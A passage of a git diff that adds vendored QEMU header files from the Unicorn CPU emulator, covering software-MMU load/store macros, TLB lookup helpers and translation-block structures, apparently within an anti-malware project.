iotlb_v[NB_MMU_MODES][CPU_VTLB_SIZE]; \ + target_ulong tlb_flush_addr; \ + target_ulong tlb_flush_mask; \ + target_ulong vtlb_index; \ + +#else + +#define CPU_COMMON_TLB + +#endif + + +#define CPU_TEMP_BUF_NLONGS 128 + +// Unicorn engine +// @invalid_addr: invalid memory access address +// @invalid_error: error code for memory access (1 = READ, 2 = WRITE) +#define CPU_COMMON \ + /* soft mmu support */ \ + CPU_COMMON_TLB \ + uint64_t invalid_addr; \ + int invalid_error; +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst.h new file mode 100644 index 0000000..715cee5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst.h @@ -0,0 +1,400 @@ +/* + * Software MMU support + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + * + */ + +/* + * Generate inline load/store functions for all MMU modes (typically + * at least _user and _kernel) as well as _data versions, for all data + * sizes. + * + * Used by target op helpers. + * + * MMU mode suffixes are defined in target cpu.h. + */ +#ifndef CPU_LDST_H +#define CPU_LDST_H + +#if defined(CONFIG_USER_ONLY) +/* All direct uses of g2h and h2g need to go away for usermode softmmu. */ +#define g2h(x) ((void *)((unsigned long)(target_ulong)(x) + GUEST_BASE)) + +#if HOST_LONG_BITS <= TARGET_VIRT_ADDR_SPACE_BITS +#define h2g_valid(x) 1 +#else +#define h2g_valid(x) ({ \ + unsigned long __guest = (unsigned long)(x) - GUEST_BASE; \ + (__guest < (1ul << TARGET_VIRT_ADDR_SPACE_BITS)) && \ + (!RESERVED_VA || (__guest < RESERVED_VA)); \ +}) +#endif + +#define h2g_nocheck(x) ({ \ + unsigned long __ret = (unsigned long)(x) - GUEST_BASE; \ + (abi_ulong)__ret; \ +}) + +#define h2g(x) ({ \ + /* Check if given address fits target address space */ \ + assert(h2g_valid(x)); \ + h2g_nocheck(x); \ +}) + +#define saddr(x) g2h(x) +#define laddr(x) g2h(x) + +#else /* !CONFIG_USER_ONLY */ +/* NOTE: we use double casts if pointers and target_ulong have + different sizes */ +#define saddr(x) (uint8_t *)(intptr_t)(x) +#define laddr(x) (uint8_t *)(intptr_t)(x) +#endif + +#define ldub_raw(p) ldub_p(laddr((p))) +#define ldsb_raw(p) ldsb_p(laddr((p))) +#define lduw_raw(p) lduw_p(laddr((p))) +#define ldsw_raw(p) ldsw_p(laddr((p))) +#define ldl_raw(p) ldl_p(laddr((p))) +#define ldq_raw(p) ldq_p(laddr((p))) +#define ldfl_raw(p) ldfl_p(laddr((p))) +#define ldfq_raw(p) ldfq_p(laddr((p))) +#define stb_raw(p, v) stb_p(saddr((p)), v) +#define stw_raw(p, v) stw_p(saddr((p)), v) +#define stl_raw(p, v) stl_p(saddr((p)), v) +#define stq_raw(p, v) stq_p(saddr((p)), v) +#define stfl_raw(p, v) stfl_p(saddr((p)), v) +#define stfq_raw(p, v) stfq_p(saddr((p)), v) + + +#if defined(CONFIG_USER_ONLY) + +/* if user mode, no other memory access functions */ +#define ldub(p) ldub_raw(p) +#define ldsb(p) ldsb_raw(p) +#define lduw(p) lduw_raw(p) +#define ldsw(p) ldsw_raw(p) +#define ldl(p) ldl_raw(p) +#define ldq(p) ldq_raw(p) +#define ldfl(p) ldfl_raw(p) +#define ldfq(p) ldfq_raw(p) +#define stb(p, v) stb_raw(p, v) +#define stw(p, v) stw_raw(p, v) +#define stl(p, v) stl_raw(p, v) +#define stq(p, v) stq_raw(p, v) +#define stfl(p, v) stfl_raw(p, v) +#define stfq(p, v) stfq_raw(p, v) + +#define cpu_ldub_code(env1, p) ldub_raw(p) +#define cpu_ldsb_code(env1, p) ldsb_raw(p) +#define cpu_lduw_code(env1, p) lduw_raw(p) +#define cpu_ldsw_code(env1, p) ldsw_raw(p) +#define cpu_ldl_code(env1, p) ldl_raw(p) +#define cpu_ldq_code(env1, p) ldq_raw(p) + +#define cpu_ldub_data(env, addr) ldub_raw(addr) +#define cpu_lduw_data(env, addr) lduw_raw(addr) +#define cpu_ldsw_data(env, addr) ldsw_raw(addr) +#define cpu_ldl_data(env, addr) ldl_raw(addr) +#define cpu_ldq_data(env, addr) ldq_raw(addr) + +#define cpu_stb_data(env, addr, data) stb_raw(addr, data) +#define cpu_stw_data(env, addr, data) stw_raw(addr, data) +#define cpu_stl_data(env, addr, data) stl_raw(addr, data) +#define cpu_stq_data(env, addr, data) stq_raw(addr, data) + +#define cpu_ldub_kernel(env, addr) ldub_raw(addr) +#define cpu_lduw_kernel(env, addr) lduw_raw(addr) +#define cpu_ldsw_kernel(env, addr) ldsw_raw(addr) +#define cpu_ldl_kernel(env, addr) ldl_raw(addr) +#define cpu_ldq_kernel(env, addr) ldq_raw(addr) + +#define cpu_stb_kernel(env, addr, data) stb_raw(addr, data) +#define cpu_stw_kernel(env, addr, data) stw_raw(addr, data) +#define cpu_stl_kernel(env, addr, data) stl_raw(addr, data) +#define cpu_stq_kernel(env, addr, data) stq_raw(addr, data) + +#define ldub_kernel(p) ldub_raw(p) +#define ldsb_kernel(p) ldsb_raw(p) +#define lduw_kernel(p) lduw_raw(p) +#define ldsw_kernel(p) ldsw_raw(p) +#define ldl_kernel(p) ldl_raw(p) +#define ldq_kernel(p) ldq_raw(p) +#define ldfl_kernel(p) ldfl_raw(p) +#define ldfq_kernel(p) ldfq_raw(p) +#define stb_kernel(p, v) stb_raw(p, v) +#define stw_kernel(p, v) stw_raw(p, v) +#define stl_kernel(p, v) stl_raw(p, v) +#define stq_kernel(p, v) stq_raw(p, v) +#define stfl_kernel(p, v) stfl_raw(p, v) +#define stfq_kernel(p, vt) stfq_raw(p, v) + +#define cpu_ldub_data(env, addr) ldub_raw(addr) +#define cpu_lduw_data(env, addr) lduw_raw(addr) +#define cpu_ldl_data(env, addr) ldl_raw(addr) + +#define cpu_stb_data(env, addr, data) stb_raw(addr, data) +#define cpu_stw_data(env, addr, data) stw_raw(addr, data) +#define cpu_stl_data(env, addr, data) stl_raw(addr, data) + +#else + +/* XXX: find something cleaner. + * Furthermore, this is false for 64 bits targets + */ +#define ldul_user ldl_user +#define ldul_kernel ldl_kernel +#define ldul_hypv ldl_hypv +#define ldul_executive ldl_executive +#define ldul_supervisor ldl_supervisor + +/* The memory helpers for tcg-generated code need tcg_target_long etc. */ +#include "tcg.h" + +uint8_t helper_ldb_mmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint16_t helper_ldw_mmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint32_t helper_ldl_mmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint64_t helper_ldq_mmu(CPUArchState *env, target_ulong addr, int mmu_idx); + +void helper_stb_mmu(CPUArchState *env, target_ulong addr, + uint8_t val, int mmu_idx); +void helper_stw_mmu(CPUArchState *env, target_ulong addr, + uint16_t val, int mmu_idx); +void helper_stl_mmu(CPUArchState *env, target_ulong addr, + uint32_t val, int mmu_idx); +void helper_stq_mmu(CPUArchState *env, target_ulong addr, + uint64_t val, int mmu_idx); + +uint8_t helper_ldb_cmmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint16_t helper_ldw_cmmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint32_t helper_ldl_cmmu(CPUArchState *env, target_ulong addr, int mmu_idx); +uint64_t helper_ldq_cmmu(CPUArchState *env, target_ulong addr, int mmu_idx); + +#define CPU_MMU_INDEX 0 +#define MEMSUFFIX MMU_MODE0_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX + +#define CPU_MMU_INDEX 1 +#define MEMSUFFIX MMU_MODE1_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX + +#if (NB_MMU_MODES >= 3) + +#define CPU_MMU_INDEX 2 +#define MEMSUFFIX MMU_MODE2_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif /* (NB_MMU_MODES >= 3) */ + +#if (NB_MMU_MODES >= 4) + +#define CPU_MMU_INDEX 3 +#define MEMSUFFIX MMU_MODE3_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif /* (NB_MMU_MODES >= 4) */ + +#if (NB_MMU_MODES >= 5) + +#define CPU_MMU_INDEX 4 +#define MEMSUFFIX MMU_MODE4_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif /* (NB_MMU_MODES >= 5) */ + +#if (NB_MMU_MODES >= 6) + +#define CPU_MMU_INDEX 5 +#define MEMSUFFIX MMU_MODE5_SUFFIX +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif /* (NB_MMU_MODES >= 6) */ + +#if (NB_MMU_MODES > 6) +#error "NB_MMU_MODES > 6 is not supported for now" +#endif /* (NB_MMU_MODES > 6) */ + +/* these access are slower, they must be as rare as possible */ +#define CPU_MMU_INDEX (cpu_mmu_index(env)) +#define MEMSUFFIX _data +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX + +#define ldub(p) ldub_data(p) +#define ldsb(p) ldsb_data(p) +#define lduw(p) lduw_data(p) +#define ldsw(p) ldsw_data(p) +#define ldl(p) ldl_data(p) +#define ldq(p) ldq_data(p) + +#define stb(p, v) stb_data(p, v) +#define stw(p, v) stw_data(p, v) +#define stl(p, v) stl_data(p, v) +#define stq(p, v) stq_data(p, v) + +#define CPU_MMU_INDEX (cpu_mmu_index(env)) +#define MEMSUFFIX _code +#define SOFTMMU_CODE_ACCESS + +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" + +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#undef SOFTMMU_CODE_ACCESS + +/** + * tlb_vaddr_to_host: + * @env: CPUArchState + * @addr: guest virtual address to look up + * @access_type: 0 for read, 1 for write, 2 for execute + * @mmu_idx: MMU index to use for lookup + * + * Look up the specified guest virtual index in the TCG softmmu TLB. + * If the TLB contains a host virtual address suitable for direct RAM + * access, then return it. Otherwise (TLB miss, TLB entry is for an + * I/O access, etc) return NULL. + * + * This is the equivalent of the initial fast-path code used by + * TCG backends for guest load and store accesses. + */ +static inline void *tlb_vaddr_to_host(CPUArchState *env, target_ulong addr, + int access_type, int mmu_idx) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + CPUTLBEntry *tlbentry = &env->tlb_table[mmu_idx][index]; + target_ulong tlb_addr; + uintptr_t haddr; + + switch (access_type) { + case 0: + tlb_addr = tlbentry->addr_read; + break; + case 1: + tlb_addr = tlbentry->addr_write; + break; + case 2: + tlb_addr = tlbentry->addr_code; + break; + default: + g_assert_not_reached(); + } + + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK))) { + /* TLB entry is for a different page */ + return NULL; + } + + if (tlb_addr & ~TARGET_PAGE_MASK) { + /* IO access */ + return NULL; + } + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); + return (void *)haddr; +} + +#endif /* defined(CONFIG_USER_ONLY) */ + +#endif /* CPU_LDST_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst_template.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst_template.h new file mode 100644 index 0000000..fc68ee3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu_ldst_template.h @@ -0,0 +1,193 @@ +/* + * Software MMU support + * + * Generate inline load/store functions for one MMU mode and data + * size. + * + * Generate a store function as well as signed and unsigned loads. For + * 32 and 64 bit cases, also generate floating point functions with + * the same size. + * + * Not used directly but included from cpu_ldst.h. + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +#if DATA_SIZE == 8 +#define SUFFIX q +#define USUFFIX q +#define DATA_TYPE uint64_t +#elif DATA_SIZE == 4 +#define SUFFIX l +#define USUFFIX l +#define DATA_TYPE uint32_t +#elif DATA_SIZE == 2 +#define SUFFIX w +#define USUFFIX uw +#define DATA_TYPE uint16_t +#define DATA_STYPE int16_t +#elif DATA_SIZE == 1 +#define SUFFIX b +#define USUFFIX ub +#define DATA_TYPE uint8_t +#define DATA_STYPE int8_t +#else +#error unsupported data size +#endif + +#if DATA_SIZE == 8 +#define RES_TYPE uint64_t +#else +#define RES_TYPE uint32_t +#endif + +#ifdef SOFTMMU_CODE_ACCESS +#define ADDR_READ addr_code +#define MMUSUFFIX _cmmu +#else +#define ADDR_READ addr_read +#define MMUSUFFIX _mmu +#endif + +/* generic load/store macros */ + +static inline RES_TYPE +glue(glue(cpu_ld, USUFFIX), MEMSUFFIX)(CPUArchState *env, target_ulong ptr) +{ + int page_index; + RES_TYPE res; + target_ulong addr; + int mmu_idx; + + addr = ptr; + page_index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + mmu_idx = CPU_MMU_INDEX; + if (unlikely(env->tlb_table[mmu_idx][page_index].ADDR_READ != + (addr & (TARGET_PAGE_MASK | (DATA_SIZE - 1))))) { + res = glue(glue(helper_ld, SUFFIX), MMUSUFFIX)(env, addr, mmu_idx); + } else { + uintptr_t hostaddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][page_index].addend); + res = glue(glue(ld, USUFFIX), _raw)(hostaddr); + } + return res; +} + +#if DATA_SIZE <= 2 +static inline int +glue(glue(cpu_lds, SUFFIX), MEMSUFFIX)(CPUArchState *env, target_ulong ptr) +{ + int res, page_index; + target_ulong addr; + int mmu_idx; + + addr = ptr; + page_index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + mmu_idx = CPU_MMU_INDEX; + if (unlikely(env->tlb_table[mmu_idx][page_index].ADDR_READ != + (addr & (TARGET_PAGE_MASK | (DATA_SIZE - 1))))) { + res = (DATA_STYPE)glue(glue(helper_ld, SUFFIX), + MMUSUFFIX)(env, addr, mmu_idx); + } else { + uintptr_t hostaddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][page_index].addend); + res = glue(glue(lds, SUFFIX), _raw)(hostaddr); + } + return res; +} +#endif + +#ifndef SOFTMMU_CODE_ACCESS + +/* generic store macro */ + +static inline void +glue(glue(cpu_st, SUFFIX), MEMSUFFIX)(CPUArchState *env, target_ulong ptr, + RES_TYPE v) +{ + int page_index; + target_ulong addr; + int mmu_idx; + + addr = ptr; + page_index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + mmu_idx = CPU_MMU_INDEX; + if (unlikely(env->tlb_table[mmu_idx][page_index].addr_write != + (addr & (TARGET_PAGE_MASK | (DATA_SIZE - 1))))) { + glue(glue(helper_st, SUFFIX), MMUSUFFIX)(env, addr, v, mmu_idx); + } else { + uintptr_t hostaddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][page_index].addend); + glue(glue(st, SUFFIX), _raw)(hostaddr, v); + } +} + + + +#if DATA_SIZE == 8 +static inline float64 glue(cpu_ldfq, MEMSUFFIX)(CPUArchState *env, + target_ulong ptr) +{ + union { + float64 d; + uint64_t i; + } u; + u.i = glue(cpu_ldq, MEMSUFFIX)(env, ptr); + return u.d; +} + +static inline void glue(cpu_stfq, MEMSUFFIX)(CPUArchState *env, + target_ulong ptr, float64 v) +{ + union { + float64 d; + uint64_t i; + } u; + u.d = v; + glue(cpu_stq, MEMSUFFIX)(env, ptr, u.i); +} +#endif /* DATA_SIZE == 8 */ + +#if DATA_SIZE == 4 +static inline float32 glue(cpu_ldfl, MEMSUFFIX)(CPUArchState *env, + target_ulong ptr) +{ + union { + float32 f; + uint32_t i; + } u; + u.i = glue(cpu_ldl, MEMSUFFIX)(env, ptr); + return u.f; +} + +static inline void glue(cpu_stfl, MEMSUFFIX)(CPUArchState *env, + target_ulong ptr, float32 v) +{ + union { + float32 f; + uint32_t i; + } u; + u.f = v; + glue(cpu_stl, MEMSUFFIX)(env, ptr, u.i); +} +#endif /* DATA_SIZE == 4 */ + +#endif /* !SOFTMMU_CODE_ACCESS */ + +#undef RES_TYPE +#undef DATA_TYPE +#undef DATA_STYPE +#undef SUFFIX +#undef USUFFIX +#undef DATA_SIZE +#undef MMUSUFFIX +#undef ADDR_READ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cputlb.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cputlb.h new file mode 100644 index 0000000..1a43d32 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cputlb.h @@ -0,0 +1,48 @@ +/* + * Common CPU TLB handling + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +#ifndef CPUTLB_H +#define CPUTLB_H + +#if !defined(CONFIG_USER_ONLY) +/* cputlb.c */ +void tlb_protect_code(struct uc_struct *uc, ram_addr_t ram_addr); +void tlb_unprotect_code_phys(CPUState *cpu, ram_addr_t ram_addr, + target_ulong vaddr); +void tlb_reset_dirty_range(CPUTLBEntry *tlb_entry, + uintptr_t start, uintptr_t length); +void cpu_tlb_reset_dirty_all(struct uc_struct *uc, ram_addr_t start1, ram_addr_t length); +void tlb_set_dirty(CPUArchState *env, target_ulong vaddr); +//extern int tlb_flush_count; + +/* exec.c */ +void tb_flush_jmp_cache(CPUState *cpu, target_ulong addr); + +MemoryRegionSection * +address_space_translate_for_iotlb(AddressSpace *as, hwaddr addr, hwaddr *xlat, + hwaddr *plen); +hwaddr memory_region_section_get_iotlb(CPUState *cpu, + MemoryRegionSection *section, + target_ulong vaddr, + hwaddr paddr, hwaddr xlat, + int prot, + target_ulong *address); +bool memory_region_is_unassigned(struct uc_struct* uc, MemoryRegion *mr); + +#endif +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/exec-all.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/exec-all.h new file mode 100644 index 0000000..e839825 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/exec-all.h @@ -0,0 +1,379 @@ +/* + * internal execution defines for qemu + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +#ifndef _EXEC_ALL_H_ +#define _EXEC_ALL_H_ + +#include "qemu-common.h" + +/* allow to see translation results - the slowdown should be negligible, so we leave it */ +#define DEBUG_DISAS + +/* Page tracking code uses ram addresses in system mode, and virtual + addresses in userspace mode. Define tb_page_addr_t to be an appropriate + type. */ +#if defined(CONFIG_USER_ONLY) +typedef abi_ulong tb_page_addr_t; +#else +typedef ram_addr_t tb_page_addr_t; +#endif + +/* is_jmp field values */ +#define DISAS_NEXT 0 /* next instruction can be analyzed */ +#define DISAS_JUMP 1 /* only pc was modified dynamically */ +#define DISAS_UPDATE 2 /* cpu state was modified dynamically */ +#define DISAS_TB_JUMP 3 /* only pc was modified statically */ + +struct TranslationBlock; +typedef struct TranslationBlock TranslationBlock; + +/* XXX: make safe guess about sizes */ +#define MAX_OP_PER_INSTR 266 + +#if HOST_LONG_BITS == 32 +#define MAX_OPC_PARAM_PER_ARG 2 +#else +#define MAX_OPC_PARAM_PER_ARG 1 +#endif +#define MAX_OPC_PARAM_IARGS 5 +#define MAX_OPC_PARAM_OARGS 1 +#define MAX_OPC_PARAM_ARGS (MAX_OPC_PARAM_IARGS + MAX_OPC_PARAM_OARGS) + +/* A Call op needs up to 4 + 2N parameters on 32-bit archs, + * and up to 4 + N parameters on 64-bit archs + * (N = number of input arguments + output arguments). */ +#define MAX_OPC_PARAM (4 + (MAX_OPC_PARAM_PER_ARG * MAX_OPC_PARAM_ARGS)) +#define OPC_MAX_SIZE (OPC_BUF_SIZE - MAX_OP_PER_INSTR) + +/* Maximum size a TCG op can expand to. This is complicated because a + single op may require several host instructions and register reloads. + For now take a wild guess at 192 bytes, which should allow at least + a couple of fixup instructions per argument. */ +#define TCG_MAX_OP_SIZE 192 + +#define OPPARAM_BUF_SIZE (OPC_BUF_SIZE * MAX_OPC_PARAM) + +#include "qemu/log.h" + +void gen_intermediate_code(CPUArchState *env, struct TranslationBlock *tb); +void gen_intermediate_code_pc(CPUArchState *env, struct TranslationBlock *tb); +void restore_state_to_opc(CPUArchState *env, struct TranslationBlock *tb, + int pc_pos); +bool cpu_restore_state(CPUState *cpu, uintptr_t searched_pc); + +void QEMU_NORETURN cpu_resume_from_signal(CPUState *cpu, void *puc); + +void QEMU_NORETURN cpu_io_recompile(CPUState *cpu, uintptr_t retaddr); +TranslationBlock *tb_gen_code(CPUState *cpu, + target_ulong pc, target_ulong cs_base, int flags, + int cflags); +void cpu_exec_init(CPUArchState *env, void *opaque); + +void QEMU_NORETURN cpu_loop_exit(CPUState *cpu); + +void tb_invalidate_phys_page_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end, + int is_cpu_write_access); +void tb_invalidate_phys_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end, + int is_cpu_write_access); +#if !defined(CONFIG_USER_ONLY) +void tcg_cpu_address_space_init(CPUState *cpu, AddressSpace *as); +/* cputlb.c */ +void tlb_flush_page(CPUState *cpu, target_ulong addr); +void tlb_flush(CPUState *cpu, int flush_global); +void tlb_set_page(CPUState *cpu, target_ulong vaddr, + hwaddr paddr, int prot, + int mmu_idx, target_ulong size); + +void tb_invalidate_phys_addr(AddressSpace *as, hwaddr addr); + +#else +static inline void tlb_flush_page(CPUState *cpu, target_ulong addr) +{ +} + +static inline void tlb_flush(CPUState *cpu, int flush_global) +{ +} +#endif + +#define CODE_GEN_ALIGN 16 /* must be >= of the size of a icache line */ + +#define CODE_GEN_PHYS_HASH_BITS 15 +#define CODE_GEN_PHYS_HASH_SIZE (1 << CODE_GEN_PHYS_HASH_BITS) + +/* estimated block size for TB allocation */ +/* XXX: use a per code average code fragment size and modulate it + according to the host CPU */ +#if defined(CONFIG_SOFTMMU) +#define CODE_GEN_AVG_BLOCK_SIZE 128 +#else +#define CODE_GEN_AVG_BLOCK_SIZE 64 +#endif + +#if defined(__arm__) || defined(_ARCH_PPC) \ + || defined(__x86_64__) || defined(__i386__) \ + || defined(__sparc__) || defined(__aarch64__) \ + || defined(__s390x__) || defined(__mips__) \ + || defined(CONFIG_TCG_INTERPRETER) +#define USE_DIRECT_JUMP +#endif + +struct TranslationBlock { + target_ulong pc; /* simulated PC corresponding to this block (EIP + CS base) */ + target_ulong cs_base; /* CS base for this block */ + uint64_t flags; /* flags defining in which context the code was generated */ + uint16_t size; /* size of target code for this block (1 <= + size <= TARGET_PAGE_SIZE) */ + uint16_t cflags; /* compile flags */ +#define CF_COUNT_MASK 0x7fff +#define CF_LAST_IO 0x8000 /* Last insn may be an IO access. */ + + void *tc_ptr; /* pointer to the translated code */ + /* next matching tb for physical address. */ + struct TranslationBlock *phys_hash_next; + /* first and second physical page containing code. The lower bit + of the pointer tells the index in page_next[] */ + struct TranslationBlock *page_next[2]; + tb_page_addr_t page_addr[2]; + + /* the following data are used to directly call another TB from + the code of this one. */ + uint16_t tb_next_offset[2]; /* offset of original jump target */ +#ifdef USE_DIRECT_JUMP + uint16_t tb_jmp_offset[2]; /* offset of jump instruction */ +#else + uintptr_t tb_next[2]; /* address of jump generated code */ +#endif + /* list of TBs jumping to this one. This is a circular list using + the two least significant bits of the pointers to tell what is + the next pointer: 0 = jmp_next[0], 1 = jmp_next[1], 2 = + jmp_first */ + struct TranslationBlock *jmp_next[2]; + struct TranslationBlock *jmp_first; + uint32_t icount; +}; + +typedef struct TBContext TBContext; + +struct TBContext { + + TranslationBlock *tbs; + TranslationBlock *tb_phys_hash[CODE_GEN_PHYS_HASH_SIZE]; + int nb_tbs; + + /* statistics */ + int tb_flush_count; + int tb_phys_invalidate_count; + + int tb_invalidated_flag; +}; + +static inline unsigned int tb_jmp_cache_hash_page(target_ulong pc) +{ + target_ulong tmp; + tmp = pc ^ (pc >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)); + return (tmp >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)) & TB_JMP_PAGE_MASK; +} + +static inline unsigned int tb_jmp_cache_hash_func(target_ulong pc) +{ + target_ulong tmp; + tmp = pc ^ (pc >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)); + return (((tmp >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)) & TB_JMP_PAGE_MASK) + | (tmp & TB_JMP_ADDR_MASK)); +} + +static inline unsigned int tb_phys_hash_func(tb_page_addr_t pc) +{ + return (pc >> 2) & (CODE_GEN_PHYS_HASH_SIZE - 1); +} + +void tb_free(struct uc_struct *uc, TranslationBlock *tb); +void tb_flush(CPUArchState *env); +void tb_phys_invalidate(struct uc_struct *uc, + TranslationBlock *tb, tb_page_addr_t page_addr); + +#if defined(USE_DIRECT_JUMP) + +#if defined(CONFIG_TCG_INTERPRETER) +static inline void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + /* patch the branch destination */ + *(uint32_t *)jmp_addr = addr - (jmp_addr + 4); + /* no need to flush icache explicitly */ +} +#elif defined(_ARCH_PPC) +void ppc_tb_set_jmp_target(uintptr_t jmp_addr, uintptr_t addr); +#define tb_set_jmp_target1 ppc_tb_set_jmp_target +#elif defined(__i386__) || defined(__x86_64__) +static inline void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + /* patch the branch destination */ + stl_le_p((void*)jmp_addr, addr - (jmp_addr + 4)); + /* no need to flush icache explicitly */ +} +#elif defined(__s390x__) +static inline void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ + /* patch the branch destination */ + intptr_t disp = addr - (jmp_addr - 2); + stl_be_p((void*)jmp_addr, disp / 2); + /* no need to flush icache explicitly */ +} +#elif defined(__aarch64__) +void aarch64_tb_set_jmp_target(uintptr_t jmp_addr, uintptr_t addr); +#define tb_set_jmp_target1 aarch64_tb_set_jmp_target +#elif defined(__arm__) +static inline void tb_set_jmp_target1(uintptr_t jmp_addr, uintptr_t addr) +{ +#if 